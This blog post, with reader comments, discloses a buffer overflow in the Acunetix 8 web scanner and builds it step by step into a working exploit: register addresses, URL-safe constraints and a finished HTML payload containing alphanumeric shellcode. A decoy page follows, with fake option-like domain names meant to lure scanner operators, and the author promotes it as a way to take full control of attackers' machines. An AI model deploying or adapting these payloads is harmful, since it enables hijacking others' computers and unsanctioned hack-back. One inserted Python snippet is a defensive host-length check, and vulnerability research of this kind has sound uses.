A few weeks ago I published an article about a WINRAR 0DAY.
That article revealed a new vulnerability that gave attackers the ability to perform a spoofing attack.
Many people wrote to me about the problems with that kind of article (for example).
So this time I’m going to reveal a new 0DAY that will help security managers protect their web sites against many vulnerability scans.
A lot of site owners will tell you that the majority of the scans performed against their sites are performed by automatic tools like NESSUS, ACUNETIX, and APPSCAN.
Today's 0DAY will focus on one of the most popular web scanners in the world, ACUNETIX.
The POC will be against ACUNETIX 8 (build 20120704, since it’s one of the most common cracked versions published on the net and used by many newbie hackers).
This disclosure will not only reveal a new vulnerability, but also demonstrate a whole new perception of dealing with external attacks.
Instead of protecting your web sites again and again, or buying a new advanced WAF (web application firewall), let’s give the attackers a reason to be afraid, a reason to think twice before they press the “SCAN” button.
In this article, I will not give a full working exploit for all scan scenarios or for all operating systems, but a proof of concept that will hopefully grow into a new research effort on vulnerabilities in penetration test tools.
So let’s get our hands dirty.
ACUNETIX is a powerful tool for scanning websites and finding vulnerabilities in them.
Many newbie attackers tend to use this tool because it is so simple to use.
ACUNETIX offers its users a simple wizard-based scan that covers many aspects of a vulnerability scan.
One of these aspects is the ability to scan additional domains or subdomains related to the scanned website. For example, if we scan my blog “http://an7isec.blogspot.co.il”, we will get the result shown below:
After a little research into this option, I figured out that ACUNETIX starts its wizard by sending an HTTP request to the site and learning about it from its HTTP response.
Furthermore, the wizard learns about external related domains from the external sources that appear on the website, for example:
“<img src=http://externalSource.com/someimg.png >”
“<a href=http://externalSource.com/ ></a>”
Etc...
Further analysis reveals that if the length of one of the external domain names is more than 268 bytes, ACUNETIX will crash. So if we want to cause a crash, all we need to do is put some kind of external source on our site whose length is 268 bytes or more, say something like this:
<A href= “http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAA”>
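From the scanner operator's side, the same observation gives a pre-scan check: list every external reference on a page whose host name is longer than DNS allows. This is an added example, not part of the original post; the function names and the sample page are constructed, and the 253/63 limits are the standard DNS name and label limits, not values from the article.

```python
from html.parser import HTMLParser

MAX_NAME = 253   # DNS limit for a whole host name (standard, not from the article)
MAX_LABEL = 63   # DNS limit for one dot-separated label
CRASH_LEN = 268  # host-name length at which the article reports the crash

def host_of(url):
    """Return the host of an absolute URL, or None for relative links."""
    scheme, sep, rest = url.strip().partition("://")
    if not sep or not scheme.isalpha():
        return None
    for stop in "/?#":
        rest = rest.split(stop, 1)[0]
    host = rest.rsplit("@", 1)[-1]           # drop userinfo
    name, colon, port = host.rpartition(":")
    return (name if colon and port.isdigit() else host).lower()

class RefCollector(HTMLParser):
    """Collect src/href values, as a crawler's link extractor would."""
    def __init__(self):
        super().__init__()
        self.urls = []
    def handle_starttag(self, tag, attrs):
        self.urls += [v for k, v in attrs if k in ("src", "href") and v]

def suspicious_hosts(html):
    """Return (host_length, reasons) for each out-of-spec external host."""
    parser = RefCollector()
    parser.feed(html)
    findings = []
    for url in parser.urls:
        host = host_of(url)
        if not host:
            continue
        reasons = []
        if len(host) > MAX_NAME:
            reasons.append("name longer than 253")
        if any(len(label) > MAX_LABEL for label in host.split(".")):
            reasons.append("label longer than 63")
        if len(host) >= CRASH_LEN:
            reasons.append("reaches the 268-byte length from the article")
        if reasons:
            findings.append((len(host), reasons))
    return findings

# Constructed sample: two ordinary references and one over-long host name.
SAMPLE = ('<a href="http://example.com/">ok</a>'
          '<img src=http://cdn.example.net/logo.png>'
          '<img src="http://' + "a" * 300 + '/x.png">')
print(suspicious_hosts(SAMPLE))
```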
A quick view of this application in Immunity Debugger reveals that EDX was corrupted by the fuzzing string, which caused an access violation:
Despite the fact that further writing runs over the Structured Exception Handler (SEH), as you will probably notice, my advice is not to go that way. Believe me, I tried it for several days with no success (because of the SafeSEH mechanism).
However, we have another problem with this exploit. In one word: “ASCII”.
ACUNETIX gets its information about external domains as a URL.
This causes the string to be converted into a web-browser-friendly string.
While ASCII accepts chars like:
0x22 (“), 0x23 (#), 0x24 ($), 0x25 (%), 0x5C (\), 0x2F (/) and more …
a URL string accepts only printable alphanumeric chars and URL-converted special chars (with a few exceptions).
So if my external source contains one of the special chars, it will be converted into ”%SOMETHING”.
For example, the "quotes" char (“) will be converted into 253232 in memory, because that is the translation of %22.
Another example that demonstrates the URL encoding: the "percent" char (%) will be converted into 253235 in memory.
Bypassing this means building an exploit that contains only "A-Z, a-z, 0-9" chars and the few special chars that aren’t converted in the URL ENCODE process, like:
"! ( ) = } { " .
(not a simple job at all)
In short, I had to find a way to fix the flow of the application in order to avoid an SEH-based exploit (because it was impossible to bypass the SafeSEH protection with URL ASCII strings only).
Finally, I found a way.
In order to fix the flow, EDX had to be overwritten with a readable memory address.
Nevertheless, it is important to remember that EDX is not used as is, but minus 8:
MOV ECX, DWORD PTR DS:[EDX-8]
This means that whichever memory address we use, we should add 8 to the address (in the exploit), convert the whole address into a printable URL string, and hope for the best.
After a little research, I found such an address.
The address was at “0x663030XX”, and luckily it could be converted into a URL string without special bad chars --> "f005".
After playing with the code, I found that the exact location of that EDX overwrite is at an offset of 268 bytes.
So for now our exploit looks like this:
<img src=”http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAA500fBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB”>
Running ACUNETIX's scan against that payload produced the following result:
As you can see above, the EIP was overwritten!!
It appears that the idea of fixing the flow was successful, since it put me in a better position of attack (EIP overwrite).
Besides that, our potential space for shell code is now present in EAX and ESP.
When it comes to choosing between ESP and EAX, ESP is the better choice for two reasons:
One, ESP points directly at the beginning of the shell string.
Two, there is much more space for a bigger shell code to be written.
After I chose ESP, I needed to find a “JMP ESP” instruction at a memory address that could be written as a URL string (limited ASCII, as mentioned above).
The desired address was found at 0x7e79515d (SXS.DLL) – (in ASCII “]Qy~”).
After all that, our shell code is supposed to look like this:
<img src=”http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAA500fBBBB]Qy~BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB”>
- 500f = 0x66303035 : readable memory location for fixing the flow of the application that was corrupted by the buffer overflow.
- ]Qy~ = 0x7e79515d (JMP ESP from SXS.DLL).
OK, right now we are at the semifinal stage. Running the application against the above payload produced the following result:
Yeah… we landed exactly at the beginning of the final payload.
The next step is to use a suitable Windows shell made only from a URL string (limited ASCII).
Such a shell can be generated with “Metasploit” and is called an "Alphanumeric Shell".
The important thing to remember when using such a payload is that the payload's start address must be present in one of the registers. If the payload is at ESP, the first opcode of the shell needs to be "PUSH ESP".
In my proof of concept, I used a simple "CALC.EXE" shell code generated by “Metasploit”, which led me to the final stage: a working exploit!!
Moreover, our exploit successfully bypasses DEP protection, simply by choosing only addresses that aren’t compiled with DEP.
And since ACUNETIX itself is not compiled with DEP, this exploit should work perfectly on Windows XP.
After successfully reaching all our goals, let’s look at the final working exploit:
<img src="http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAA500fBBBB]Qy~TYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB
0BBXP8ACJJIHZXL9ID414ZTOKHI9LMUKVPZ6QO9X1P26QPZTW5S1JR7LCTKN8BGR3RWS9
JNYLK79ZZ165U2KKLC5RZGNNUC70NEPB9OUTQMXPNMMPV261UKL71ME2NMP7FQY0NOHKP
KZUDOZULDS8PQ02ZXM3TCZK47PQODJ8O52JNU0N72N28MZKLTNGU7ZUXDDXZSOMKL4SQK
UNKMJPOOCRODCMDKR0PGQD0EYIRVMHUZJDOGTUV2WP3OIVQ1QJSLSKGBLYKOY7NWWLNG6
LBOM5V6M0KF2NQDPMSL7XT80P61PBMTXYQDK5DMLYT231V649DZTPP26LWSQRLZLQK15X
UXYUNP1BPF4X6PZIVOTZPJJRUOCC3KD9L034LDOXX5KKXNJQMOLSJ6BCORL9WXQNKPUWN
KRKJ8JSNS4YMMOHT3ZQJOHQ4QJUQLN1VSLV5S1QYO0YA”>
We need to remember that in order to enjoy our exploit, the newbie hacker must check our extra domain name in the list of extra domains in the ACUNETIX wizard window.
So what can we do to make our domain name attractive?
Thinking about it, I came up with two ideas:
1: writing a tempting domain name that will make the hackers check that domain, like ADMIN.ControlMangment.1249874350345.An7isec.blogspot.co.il .
2: using several external domains with the following names:
“SQLINJECTION”
“XSS”
“CSRF”
And so on…
These kinds of names will probably give the hacker's eye the feeling that the domain list window is actually an options window.
The code below demonstrates that kind of misdirection:
<html>
<img src="http://SQLInjection........................................
.....................................................................
.....................................................................
............AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAA500fBBBB]Qy~TYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB
0BBXP8ACJJIHZXL9ID414ZTOKHI9LMUKVPZ6QO9X1P26QPZTW5S1JR7LCTKN8BGR3RWS9
JNYLK79ZZ165U2KKLC5RZGNNUC70NEPB9OUTQMXPNMMPV261UKL71ME2NMP7FQY0NOHKP
KZUDOZULDS8PQ02ZXM3TCZK47PQODJ8O52JNU0N72N28MZKLTNGU7ZUXDDXZSOMKL4SQK
UNKMJPOOCRODCMDKR0PGQD0EYIRVMHUZJDOGTUV2WP3OIVQ1QJSLSKGBLYKOY7NWWLNG6
LBOM5V6M0KF2NQDPMSL7XT80P61PBMTXYQDK5DMLYT231V649DZTPP26LWSQRLZLQK15X
UXYUNP1BPF4X6PZIVOTZPJJRUOCC3KD9L034LDOXX5KKXNJQMOLSJ6BCORL9WXQNKPUWN
KRKJ8JSNS4YMMOHT3ZQJOHQ4QJUQLN1VSLV5S1QYO0YA”>
<img src="http://XSS.................................................
.....................................................................
.....................................................................
...">
<img src="http://CSRF................................................
.....................................................................
.....................................................................
....">
<img src="http://DeepScan............................................
.....................................................................
.....................................................................
........">
<img src="http://NetworkScan.........................................
.....................................................................
.....................................................................
...........">
<img src="http://DenialOfService.....................................
.....................................................................
.....................................................................
...............">
</html>
In conclusion,
following all the above, we created a powerful exploit that newbie hackers will definitely fall for.
This exploit gives us the ability to do anything to all those nasty newbie hackers who scan our sites day and night, killing our traffic, filling all the web site forms with junk and so on…
Furthermore, it can be used to collect smart intelligence about hostile forces who want to attack our web application.
BUT!!
The more powerful idea that motivated me to reveal this concept and POC is the fact that this exploit is an anonymity killer! Even if the attacker uses the smartest and most secure proxy in the world, such as "TOR" and others, his ass will be revealed and full control of his scanning machine will be gained.
Thanks all for reading my post,
hope you enjoy it,
Happy hunting, An7i
P.S.
Here is a fully functional exploit video and a Perl script that generates a custom exploit: the exploit can be downloaded from here
Nice Job
build 20120704 is not the newest cracked version, not even close.
Well, I can tell you that newer versions are vulnerable too; I just didn't mention that in my article, but I tested it myself. Version 9 is the only one that isn't vulnerable.
Latest Acunetix WVS is version 9.0 - Build: 20140422 and it is not vulnerable to this! Tested it and confirmed!
This is awesome, epic idea and nicely implemented :-)
Thanks for this awesome contribution. Was fun reading it :-)
Excellent article thanks for sharing !
very educational. nice find mate
superb article
nicely explained :D :D
thnx fr sharing :D :D (Y) (Y)
This is the danger hahahaha !
But the important question
How can I convert my (Server.exe) to the Shell Code same?
Are there programs or is there video to explain this thing?
Awesome! love your writing :)
Just Great!
Too bad that a manager will never allow us to put it on the DMZ :(
It was very fun to read. Great idea and very nice research job! Greetings!
Nice one, will keep following your blog!! I have never thought of this attack vector before.
Also highly impressed of your finding with the winrar spoof... I have been thinking in similar path for a long time, and you showed me now it was possible..
Weissman@paranoici.org
This article can help .... I can read them with new knowledge ... thank you so much for what was given to me
This is wonderful, thank you for sharing this valuable information, we look forward to more of these articles
ReplyDeletewow..... what a great blog. nice sharing. i like this blog. thanks for the sharing the superb information.its a nice posting.superb information. double girder eot crane manufacturer
ReplyDeletehoist manufacturer
No doubt it will be very useful for my future projects. Would like to see some other posts on the same subject! website designs pakistan
ReplyDeleteNice post.A valuable information here.Thanks for sharing with us.
ReplyDeleteEcommerce Website Design Palm beach
This disclosure will not only reveal a new vulnerability, but demonstrates a whole new perception of dealing with external attacks. focus financial payday company
can you re-upload the exploit.pl